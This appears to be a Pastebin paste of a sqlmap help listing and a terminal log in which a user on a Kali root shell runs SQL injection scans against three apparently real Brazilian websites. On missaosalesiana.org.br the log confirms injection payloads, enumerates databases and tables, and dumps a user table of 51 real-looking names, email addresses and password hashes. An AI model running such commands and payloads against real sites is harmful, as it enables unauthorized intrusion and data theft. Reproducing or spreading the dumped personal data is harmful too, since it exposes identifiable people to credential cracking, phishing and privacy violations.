Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Usage: python sqlmap [options]
- Options:
- -h, --help Show basic help message and exit
- -hh Show advanced help message and exit
- --version Show program's version number and exit
- -v VERBOSE Verbosity level: 0-6 (default 1)
- Target:
- At least one of these options has to be provided to set the target(s)
- -u URL, --url=URL Target URL (e.g. "www.target.com/vuln.php?id=1")
- -g GOOGLEDORK Process Google dork results as target URLs
- Request:
- These options can be used to specify how to connect to the target URL
- --data=DATA Data string to be sent through POST
- --cookie=COOKIE HTTP Cookie header
- --random-agent Use randomly selected HTTP User-Agent header
- --proxy=PROXY Use a proxy to connect to the target URL
- --tor Use Tor anonymity network
- --check-tor Check to see if Tor is used properly
- Injection:
- These options can be used to specify which parameters to test for,
- provide custom injection payloads and optional tampering scripts
- -p TESTPARAMETER Testable parameter(s)
- --dbms=DBMS Force back-end DBMS to this value
- Detection:
- These options can be used to customize the detection phase
- --level=LEVEL Level of tests to perform (1-5, default 1)
- --risk=RISK Risk of tests to perform (0-3, default 1)
- Techniques:
- These options can be used to tweak testing of specific SQL injection
- techniques
- --technique=TECH SQL injection techniques to use (default "BEUSTQ")
- Enumeration:
- These options can be used to enumerate the back-end database
- management system information, structure and data contained in the
- tables. Moreover you can run your own SQL statements
- -a, --all Retrieve everything
- -b, --banner Retrieve DBMS banner
- --current-user Retrieve DBMS current user
- --current-db Retrieve DBMS current database
- --passwords Enumerate DBMS users password hashes
- --tables Enumerate DBMS database tables
- --columns Enumerate DBMS database table columns
- --schema Enumerate DBMS schema
- --dump Dump DBMS database table entries
- --dump-all Dump all DBMS databases tables entries
- -D DB DBMS database to enumerate
- -T TBL DBMS database table(s) to enumerate
- -C COL DBMS database table column(s) to enumerate
- Operating system access:
- These options can be used to access the back-end database management
- system underlying operating system
- --os-shell Prompt for an interactive operating system shell
- --os-pwn Prompt for an OOB shell, meterpreter or VNC
- General:
- These options can be used to set some general working parameters
- --batch Never ask for user input, use the default behaviour
- --flush-session Flush session files for current target
- Miscellaneous:
- --wizard Simple wizard interface for beginner users
- [!] to see full list of options run with '-hh'
- [*] shutting down at 12:42:18
- root@kali:~# sqlmap --url "http://www.tribunaldenoticia.com/noticias/noticia.php?id=217" --dbs
- sqlmap/1.0-dev - automatic SQL injection and database takeover tool
- http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 12:43:18
- [12:43:18] [INFO] testing connection to the target URL
- [12:43:18] [WARNING] the web server responded with an HTTP error code (403) which could interfere with the results of the tests
- [12:43:18] [INFO] testing if the target URL is stable. This can take a couple of seconds
- [12:43:20] [INFO] target URL is stable
- [12:43:20] [INFO] testing if GET parameter 'id' is dynamic
- [12:43:20] [WARNING] GET parameter 'id' does not appear dynamic
- [12:43:20] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
- [12:43:20] [INFO] testing for SQL injection on GET parameter 'id'
- [12:43:20] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
- [12:43:22] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
- [12:43:23] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
- [12:43:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
- [12:43:26] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
- [12:43:27] [INFO] testing 'MySQL inline queries'
- [12:43:27] [INFO] testing 'PostgreSQL inline queries'
- [12:43:28] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
- [12:43:28] [INFO] testing 'Oracle inline queries'
- [12:43:28] [INFO] testing 'SQLite inline queries'
- [12:43:28] [INFO] testing 'MySQL > 5.0.11 stacked queries'
- [12:43:29] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
- [12:43:31] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
- [12:43:32] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
- [12:43:33] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
- [12:43:34] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
- [12:43:35] [INFO] testing 'Oracle AND time-based blind'
- [12:43:36] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
- [12:43:50] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
- [12:43:50] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
- [12:44:01] [WARNING] GET parameter 'id' is not injectable
- [12:44:01] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')
- [12:44:01] [WARNING] HTTP error codes detected during run:
- 403 (Forbidden) - 225 times
- [*] shutting down at 12:44:01
- root@kali:~# sqlmap --url "http://www.agenciaaids.com.br/artigos/interna.php?id=447" --dbs
- sqlmap/1.0-dev - automatic SQL injection and database takeover tool
- http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 12:45:10
- [12:45:11] [INFO] testing connection to the target URL
- [12:45:11] [WARNING] the web server responded with an HTTP error code (403) which could interfere with the results of the tests
- [12:45:11] [INFO] testing if the target URL is stable. This can take a couple of seconds
- [12:45:12] [INFO] target URL is stable
- [12:45:12] [INFO] testing if GET parameter 'id' is dynamic
- [12:45:12] [WARNING] GET parameter 'id' does not appear dynamic
- [12:45:13] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
- [12:45:13] [INFO] testing for SQL injection on GET parameter 'id'
- [12:45:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
- [12:45:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
- [12:45:18] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
- [12:45:19] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
- [12:45:20] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
- [12:45:21] [INFO] testing 'MySQL inline queries'
- [12:45:21] [INFO] testing 'PostgreSQL inline queries'
- [12:45:21] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
- [12:45:21] [INFO] testing 'Oracle inline queries'
- [12:45:21] [INFO] testing 'SQLite inline queries'
- [12:45:22] [INFO] testing 'MySQL > 5.0.11 stacked queries'
- [12:45:24] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
- [12:45:25] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
- [12:45:26] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
- [12:45:27] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
- [12:45:28] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
- [12:45:30] [INFO] testing 'Oracle AND time-based blind'
- [12:45:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
- [12:45:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
- [12:45:45] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
- [12:45:59] [WARNING] GET parameter 'id' is not injectable
- [12:45:59] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Please retry with the switch '--text-only' (along with --technique=BU) as this case looks like a perfect candidate (low textual content along with inability of comparison engine to detect at least one dynamic parameter). Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')
- [12:45:59] [WARNING] HTTP error codes detected during run:
- 403 (Forbidden) - 238 times
- [*] shutting down at 12:45:59
- root@kali:~# sqlmap --url "http://www.missaosalesiana.org.br/governo.php?id=1" --dbs
- sqlmap/1.0-dev - automatic SQL injection and database takeover tool
- http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 12:46:25
- [12:46:26] [INFO] testing connection to the target URL
- [12:46:26] [INFO] testing if the target URL is stable. This can take a couple of seconds
- [12:46:27] [INFO] target URL is stable
- [12:46:27] [INFO] testing if GET parameter 'id' is dynamic
- [12:46:27] [INFO] confirming that GET parameter 'id' is dynamic
- [12:46:28] [WARNING] GET parameter 'id' does not appear dynamic
- [12:46:28] [INFO] testing for SQL injection on GET parameter 'id'
- [12:46:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
- [12:46:28] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
- [12:46:30] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
- [12:46:30] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
- [12:46:30] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
- [12:46:30] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
- [12:46:30] [INFO] testing 'MySQL inline queries'
- [12:46:31] [INFO] testing 'PostgreSQL inline queries'
- [12:46:31] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
- [12:46:31] [INFO] testing 'Oracle inline queries'
- [12:46:31] [INFO] testing 'SQLite inline queries'
- [12:46:31] [INFO] testing 'MySQL > 5.0.11 stacked queries'
- [12:46:31] [WARNING] time-based comparison requires larger statistical model, please wait.....
- [12:46:32] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
- [12:46:32] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
- [12:46:32] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
- [12:47:32] [INFO] GET parameter 'id' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable
- [12:47:32] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
- [12:47:32] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
- [12:47:33] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
- [12:47:34] [INFO] target URL appears to have 4 columns in query
- [12:47:34] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
- GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
- sqlmap identified the following injection points with a total of 42 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=1 AND 1964=1964
- Type: UNION query
- Title: MySQL UNION query (NULL) - 4 columns
- Payload: id=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7176667471,0x696d71704c536f6b4265,0x716f707371)#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: id=1 AND SLEEP(5)
- ---
- [12:47:36] [INFO] the back-end DBMS is MySQL
- web application technology: Apache
- back-end DBMS: MySQL 5.0.11
- [12:47:36] [INFO] fetching database names
- available databases [2]:
- [*] information_schema
- [*] painelflex03
- [12:47:36] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.missaosalesiana.org.br'
- [*] shutting down at 12:47:36
- root@kali:~# sqlmap --url "http://www.missaosalesiana.org.br/governo.php?id=1" -D painelflex03
- sqlmap/1.0-dev - automatic SQL injection and database takeover tool
- http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 12:47:50
- [12:47:50] [INFO] resuming back-end DBMS 'mysql'
- [12:47:50] [INFO] testing connection to the target URL
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=1 AND 1964=1964
- Type: UNION query
- Title: MySQL UNION query (NULL) - 4 columns
- Payload: id=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7176667471,0x696d71704c536f6b4265,0x716f707371)#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: id=1 AND SLEEP(5)
- ---
- [12:47:50] [INFO] the back-end DBMS is MySQL
- web application technology: Apache
- back-end DBMS: MySQL 5.0.11
- [12:47:50] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.missaosalesiana.org.br'
- [*] shutting down at 12:47:50
- root@kali:~# sqlmap --url "http://www.missaosalesiana.org.br/governo.php?id=1" -D painelflex03 --tables
- sqlmap/1.0-dev - automatic SQL injection and database takeover tool
- http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 12:47:53
- [12:47:54] [INFO] resuming back-end DBMS 'mysql'
- [12:47:54] [INFO] testing connection to the target URL
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=1 AND 1964=1964
- Type: UNION query
- Title: MySQL UNION query (NULL) - 4 columns
- Payload: id=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7176667471,0x696d71704c536f6b4265,0x716f707371)#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: id=1 AND SLEEP(5)
- ---
- [12:47:54] [INFO] the back-end DBMS is MySQL
- web application technology: Apache
- back-end DBMS: MySQL 5.0.11
- [12:47:54] [INFO] fetching tables for database: 'painelflex03'
- Database: painelflex03
- [62 tables]
- +------------------------------------+
- | cid_obras |
- | cidade |
- | encontro_irmaos |
- | jornada_salesiana |
- | mat_backup |
- | obras |
- | sem_missionario |
- | uf |
- | w83__excl_proib |
- | w83__exclusao |
- | w83_anuario |
- | w83_anuario_anuario_funcao |
- | w83_anuario_falecio |
- | w83_anuario_funcao |
- | w83_anuario_governo |
- | w83_anuario_governo_nive |
- | w83_anuario_governo_nivel |
- | w83_anuario_obra |
- | w83_anuario_obra_anuario_obra_ativ |
- | w83_anuario_obra_ativ |
- | w83_banner |
- | w83_banner_cat |
- | w83_banner_stats |
- | w83_chamado_interacaow83 |
- | w83_chamado_tipow83 |
- | w83_chamadow83 |
- | w83_colaborador |
- | w83_contadorw83 |
- | w83_contato |
- | w83_contato_dest |
- | w83_enquete |
- | w83_enquete_resps |
- | w83_enquete_resps_votos |
- | w83_evento |
- | w83_ferramenta_campo |
- | w83_galeria |
- | w83_galeria_cat |
- | w83_galeria_fotos |
- | w83_grupo |
- | w83_grupo_assessor |
- | w83_grupo_ident |
- | w83_hotsite |
- | w83_inspetor |
- | w83_mail_em_grw83 |
- | w83_mail_emw83 |
- | w83_mail_enviow83 |
- | w83_mailw83 |
- | w83_mat |
- | w83_mat_cat |
- | w83_mat_sub |
- | w83_materia |
- | w83_materia_cat |
- | w83_materia_coment |
- | w83_materia_sub |
- | w83_projeto |
- | w83_revista_fotos |
- | w83_trilha |
- | w83_trilha_album |
- | w83_usuario |
- | w83_usuario_ferramenta |
- | w83_video |
- | w83_video_cat |
- +------------------------------------+
- [12:47:54] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.missaosalesiana.org.br'
- [*] shutting down at 12:47:54
- root@kali:~# sqlmap --url "http://www.missaosalesiana.org.br/governo.php?id=1" -D painelflex03 -T w83_usuario --dump
- sqlmap/1.0-dev - automatic SQL injection and database takeover tool
- http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 12:48:37
- [12:48:38] [INFO] resuming back-end DBMS 'mysql'
- [12:48:38] [INFO] testing connection to the target URL
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=1 AND 1964=1964
- Type: UNION query
- Title: MySQL UNION query (NULL) - 4 columns
- Payload: id=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7176667471,0x696d71704c536f6b4265,0x716f707371)#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: id=1 AND SLEEP(5)
- ---
- [12:48:38] [INFO] the back-end DBMS is MySQL
- web application technology: Apache
- back-end DBMS: MySQL 5.0.11
- [12:48:38] [INFO] fetching columns for table 'w83_usuario' in database 'painelflex03'
- [12:48:38] [INFO] fetching entries for table 'w83_usuario' in database 'painelflex03'
- [12:48:38] [INFO] analyzing table dump for possible password hashes
- Database: painelflex03
- Table: w83_usuario
- [51 entries]
- +----+---------------------------------------------+------+-------+---------------------------------------------+-----------------+-------------+---------------------+-----------+---------------------+
- | id | nome | sexo | nivel | email | senha | empresa | a_atual | bloqueado | a_anterior |
- +----+---------------------------------------------+------+-------+---------------------------------------------+-----------------+-------------+---------------------+-----------+---------------------+
- | 1 | \xcanio Chaves Carvalho | M | 4 | enio@digitalmt.com.br | 9d962b8164d7b6a | Digital Art | 2012-01-17 14:43:43 | NULL | 2012-01-13 17:07:01 |
- | 2 | Fl\xe1dima Christofari | F | 3 | comunicacao@missaosalesiana.org.br | af197920dc701ec | <blank> | 2012-01-27 17:38:51 | NULL | 2012-01-27 14:58:05 |
- | 3 | Maur\xedcio Mendes Ortiz | M | 3 | mauricio@msmt.org.br | 60b43f3afe7757f | <blank> | 2009-08-18 09:38:00 | NULL | 2009-07-27 11:54:12 |
- | 56 | \xcanio | M | 4 | enio@pop.com.br | 2eb96c1d43b53b2 | <blank> | 2011-12-08 12:46:11 | NULL | 2011-10-13 09:30:17 |
- | 6 | Recep\xe7\xe3o | F | 3 | recepcao@missaosalesiana.org.br | ed95e52762ab7bf | <blank> | 2011-08-09 08:12:56 | NULL | 2011-08-07 19:41:41 |
- | 59 | Gilmar Vieira | M | 2 | ajs@missaosalesiana.org.br | 24aa901725e42b2 | <blank> | 2011-12-13 15:12:13 | NULL | 2011-12-13 15:12:12 |
- | 8 | L\xfadio da Silva | M | 2 | ludio@cdb.br | e2fef250410c520 | <blank> | 2012-01-27 08:42:11 | NULL | 2011-12-01 16:46:36 |
- | 9 | Patricia Geovana da Silva Brito | F | 2 | patriciageovanna05@hotmail.com | 436f2d10ecd8d57 | <blank> | 2012-01-26 15:35:28 | NULL | 2011-12-13 11:33:53 |
- | 49 | Mauri Silvestre do Couto | M | 2 | cpd@colegiosale.com.br | 78b1045c6aea2b4 | <blank> | 2011-04-13 08:55:45 | NULL | 2011-04-13 08:13:43 |
- | 13 | Osmar Orotides de Resende | M | 2 | osmaresende@hotmail.com | 3f9a3a5699e961c | <blank> | 2009-08-27 10:06:16 | NULL | NULL |
- | 14 | Marcel Silvestre do Couto | M | 2 | marcelcouto@gmail.com | 1d35346825a6bda | <blank> | 2010-03-01 20:12:55 | NULL | 2010-03-01 09:50:04 |
- | 15 | Alysson Jos\xe9 de Paula Silva | M | 2 | pastoral.cj-tl@missaosalesiana.org.br | b08fab69aece1a4 | <blank> | 2011-10-24 12:40:07 | NULL | 2011-10-24 11:30:22 |
- | 16 | Silvia Tada | F | 2 | silvia@ucdb.br | 382558c9ee44f7b | <blank> | 2011-01-24 14:37:25 | NULL | 2010-12-21 11:20:59 |
- | 17 | Jakson Pereira | M | 2 | jakson@ucdb.br | eaeb158b398c40a | <blank> | 2010-11-25 16:44:43 | NULL | 2010-10-26 16:10:20 |
- | 18 | Cleuza Maria Loubet Cardoso | F | 2 | assistencia.social@missaosalesiana.org.br | 36cdb2d2d5b5395 | <blank> | 2011-08-07 19:24:04 | NULL | 2009-12-01 09:12:53 |
- | 19 | Denise Regina Rosa Barbosa | F | 2 | juridico@missaosalesiana.org.br | fa5ffc337a8a2fc | <blank> | 2011-08-07 19:31:47 | NULL | 2009-12-29 14:13:07 |
- | 20 | Maikon Luis Malaquias | M | 2 | comunica@salesiano-ata.br | 37e13c25f1ea5a8 | <blank> | 2012-01-20 16:52:09 | NULL | 2012-01-16 09:07:10 |
- | 36 | Ampare | M | 2 | coordenador.ampare@missaosalesiana.org.br | d39b0d566e13c16 | <blank> | 2011-04-28 09:56:43 | NULL | 2011-04-28 09:48:16 |
- | 22 | Tatiana Ri\xe7a | F | 2 | tati.rica@hotmail.com | fdcea02e881bcc5 | <blank> | 2009-09-14 18:22:09 | NULL | 2009-09-14 17:56:24 |
- | 52 | Wellington Aguilar M. Proen\xe7a | M | 2 | wamp@santuariomariaauxiliadora.com.br | ae23953b9e61db8 | <blank> | 2011-08-07 19:37:43 | NULL | 2011-06-25 12:13:41 |
- | 24 | Luiz Felipe de Souza Jimenez | M | 2 | lipe2301@hotmail.com | 161237d66b8095a | <blank> | 2011-11-18 08:59:54 | NULL | 2011-11-17 09:28:40 |
- | 25 | Marcelo de Oliveira Pereira | M | 2 | mop.marcelo@gmail.com | e709109241e8f02 | <blank> | 2011-07-28 17:00:20 | NULL | 2011-07-27 16:13:46 |
- | 26 | Angelo C\xe9sar Cenerin | F | 2 | angelo@centrojuvenil.org.br | 04efb69af00d458 | <blank> | 2012-01-13 20:08:09 | NULL | 2011-08-05 19:13:01 |
- | 27 | Tamiris Riani Silv\xe9rio de Souza | F | 2 | tamirissouza@cssg.g12.br | e1cb45714c61f62 | <blank> | 2011-05-10 09:03:23 | NULL | 2009-12-15 15:22:17 |
- | 28 | Tarley da Guia Nunes da Mata | M | 2 | tirowa@gmail.com | 689ea35f534c3ec | <blank> | 2011-08-07 19:40:27 | NULL | 2010-09-08 00:13:41 |
- | 30 | Ros\xe2ngela Concei\xe7\xe3o Rodrigues Dias | F | 2 | rengeldias1@hotmail.com | e8a354b6dfe18cc | <blank> | 2009-09-23 22:25:47 | NULL | 2009-09-23 18:22:47 |
- | 50 | Jo\xe3o Antonio Madalosso J\xfanior | M | 2 | madalosso@missaosalesiana.org.br | 6a73691f33cf775 | <blank> | 2011-02-02 09:01:03 | NULL | 2011-02-02 08:56:46 |
- | 51 | Carlos Eduardo Rodrigues Or\xe1cio | M | 3 | comunicacao08@missaosalesiana.org.br | 1600dce77266877 | <blank> | 2012-01-13 13:53:03 | NULL | 2012-01-13 00:04:35 |
- | 33 | Vanderson de Souza Gomes | M | 2 | vanderson@missaosalesiana.org.br | df026689d7cc2db | <blank> | 2011-01-13 15:49:10 | NULL | 2011-01-13 15:35:18 |
- | 35 | Israel Rafael Esp\xedndola | M | 2 | comunicacaopsjb@hotmail.com | 8551f127f09a851 | <blank> | 2011-08-05 19:42:27 | NULL | 2010-03-31 10:33:00 |
- | 37 | Luiz Fernando Southier | M | 2 | luizsouthier@gmail.com | 39bf05d429d67f0 | <blank> | 2011-02-10 09:24:35 | NULL | 2010-10-18 11:29:27 |
- | 40 | Euller da Silva | M | 2 | euller@missaosalesiana.org.br | 634425147a31e0d | <blank> | 2010-08-23 17:17:29 | NULL | 2010-05-28 09:45:42 |
- | 41 | Vera L\xfacia Desmarest | F | 2 | assistencia.social05@missaosalesiana.org.br | d0150f46158c321 | <blank> | 2011-08-07 19:38:57 | NULL | 2010-04-26 14:55:39 |
- | 42 | Matheus Lima | M | 2 | matheuslima22@msn.com | ea1721f70e71839 | <blank> | 2011-09-30 09:58:47 | NULL | 2011-09-30 09:00:54 |
- | 43 | Mateus Rezende | M | 2 | mateusrezende.mr@gmail.com | 3f883b91bb3195d | <blank> | 2010-06-22 16:31:26 | NULL | 2010-06-22 16:31:26 |
- | 45 | Mestre Teixeira | M | 3 | economo@missaosalesiana.org.br | 909adc1236579a6 | <blank> | 2010-07-10 11:23:55 | NULL | 2010-07-10 11:20:50 |
- | 46 | Jos\xe9 Marcos de Oliveira | M | 2 | josemarcos@missaosalesiana.org.br | eac0874f66d9bb7 | <blank> | 2010-08-05 18:37:52 | NULL | 2010-07-28 08:42:00 |
- | 47 | Rafael Zanata Albertini | M | 2 | rafaelalbertini@missaosalesiana.org.br | e2e60b4317bb269 | <blank> | 2012-01-13 23:09:33 | NULL | 2011-01-28 09:31:28 |
- | 48 | Jo\xe3o Vitor Aparecido Ortiz | M | 2 | joaovitor@missaosalesiana.org.br | bb5255787864b25 | <blank> | 2011-08-07 19:34:12 | NULL | 2010-11-04 16:46:37 |
- | 53 | Wilson Roberto Marques | M | 2 | wilson@cssg.g12.br | 2d79f9ba9015f03 | <blank> | 2011-12-13 10:19:24 | NULL | 2011-12-12 11:10:38 |
- | 57 | Silvio Andrade | M | 2 | silviopress@terra.com.br | 1d7a7c6b50b4f8e | <blank> | 2011-05-30 15:12:05 | NULL | NULL |
- | 55 | Augusto Rodrigues de Souza | M | 2 | augusto@missaosalesiana.org.br | 42a4b2e7ba0d96f | <blank> | 2011-12-05 14:36:29 | NULL | 2011-11-24 17:50:17 |
- | 58 | Me. Stivanelli | M | 2 | rafaelcaldato@missaosalesiana.org.br | d8f837c19d628de | <blank> | 2011-11-03 10:47:05 | NULL | 2011-10-22 19:16:26 |
- | 60 | Diego Henrique Franco | M | 2 | tecnologia@missaosalesiana.org.br | 2e75310a0c95ca2 | <blank> | NULL | NULL | NULL |
- | 63 | Marcelo Uenaka | M | 2 | marketing@unisalesiano.edu.br | 1f7acd2e6e1fe1f | <blank> | NULL | NULL | NULL |
- | 61 | Rakel Faria Ferreira | F | 2 | rakelfferreira@gmail.com | 89794b621a313bb | <blank> | NULL | NULL | NULL |
- | 62 | Rafael Gustavo Santos Souza Lopes | M | 2 | rafaelgustav@hotmail.com | 89794b621a313bb | <blank> | NULL | NULL | NULL |
- | 64 | Fl\xe1dima Christofari | F | 2 | fladimachristofari@gmail.com | cbbbd598cd1c284 | <blank> | NULL | NULL | NULL |
- | 65 | P Jo\xe3o Marcos Ara\xfajo Ramos | M | 2 | joaoramos@missaosalesiana.org.br | 89794b621a313bb | <blank> | NULL | NULL | NULL |
- | 66 | Jo\xe3o Marcos de Ara\xfajo Ramos | M | 2 | joaomarcos@missaosalesiana.org.br | 89794b621a313bb | <blank> | NULL | NULL | NULL |
- | 67 | Tarley da Mata | M | 1 | tarley@missaosalesiana.org.br | cffc2e8269d1758 | <blank> | NULL | NULL | NULL |
- +----+---------------------------------------------+------+-------+---------------------------------------------+-----------------+-------------+---------------------+-----------+---------------------+
- [12:48:38] [INFO] table 'painelflex03.w83_usuario' dumped to CSV file '/usr/share/sqlmap/output/www.missaosalesiana.org.br/dump/painelflex03/w83_usuario.csv'
- [12:48:38] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.missaosalesiana.org.br'
- [*] shutting down at 12:48:38
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement